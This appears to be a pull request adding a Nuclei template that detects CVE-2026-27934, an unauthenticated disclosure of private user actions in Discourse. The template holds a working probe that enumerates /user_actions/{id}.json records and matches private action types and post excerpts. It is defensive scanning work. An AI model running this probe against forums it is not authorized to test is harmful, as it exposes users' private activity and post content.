### PR TITLE
Add CVE-2026-27934 template

### DIFF
--- a/http/cves/2026/CVE-2026-27934.yaml
+++ b/http/cves/2026/CVE-2026-27934.yaml
@@ -1,0 +1,67 @@
+id: CVE-2026-27934
+
+info:
+  name: "Discourse < 2026.1.2/2026.2.1/2026.3.0-latest.1 - Unauthenticated Private User Action Disclosure"
+  author: str4k3r
+  severity: high
+  description: >
+    Discourse's UserActionsController#show (GET /user_actions/{id}.json) does not call
+    ensure_user_actions_visible! before rendering, unlike the #index action. This lets an
+    unauthenticated attacker fetch any user_action record by its numeric id, including
+    private action types (was_liked, response, mention, quote, edit) that are normally
+    hidden from anyone but the target user, admins, and staff. The response discloses the
+    associated topic title and post excerpt regardless of the target user's profile
+    visibility or the endpoint's private-action restrictions. Fixed by adding an explicit
+    ensure_user_actions_visible! check (guardian.can_see_profile? + guardian.can_see_user_actions?)
+    to the show action.
+  impact: >
+    An unauthenticated visitor can enumerate private user-action records and
+    disclose associated topic titles and post excerpts that should be visible
+    only to the affected user or privileged staff.
+  remediation: Upgrade Discourse to 2026.1.2, 2026.2.1, 2026.3.0-latest.1, or later.
+  reference:
+    - https://github.com/discourse/discourse/security/advisories/GHSA-824f-66wh-xx3g
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27934
+  classification:
+    cve-id: CVE-2026-27934
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 20
+  tags: cve,cve2026,discourse,idor,exposure,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user_actions/{{id}}.json"
+    payloads:
+      id:
+        - 1
+        - 2
+        - 3
+        - 4
+        - 5
+        - 6
+        - 7
+        - 8
+        - 9
+        - 10
+        - 11
+        - 12
+        - 13
+        - 14
+        - 15
+        - 16
+        - 17
+        - 18
+        - 19
+        - 20
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(header, 'application/json')"
+          - "regex('\"action_type\":(2|6|7|9|11)([,}])', body)"
+          - "contains(body, '\"excerpt\":')"
+        condition: and


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-27934, an unauthenticated private user-action
disclosure in Discourse.

## Detection

The template performs read-only GET requests against a small range of generic
`/user_actions/{id}.json` records. It reports only when a response contains a
private action type together with its associated excerpt. Fixed Discourse
versions enforce the visibility check and return no matching private action.

The probe does not create users, posts, likes, edits, or user-action records;
it only reads existing records. Installations without private user actions
correctly produce no finding.

## Validation

- Vulnerable official Discourse `2026.1.1`: `DETECTED` 3/3
- Fixed official Discourse `2026.1.2`: `NOT_DETECTED` 3/3
- Native Nuclei v3.11.0 template validation: passed
- V/F validation used disposable forum state solely to create private actions;
  the final detector itself performs only unauthenticated GET requests

## References

- https://github.com/discourse/discourse/security/advisories/GHSA-824f-66wh-xx3g
- https://nvd.nist.gov/vuln/detail/CVE-2026-27934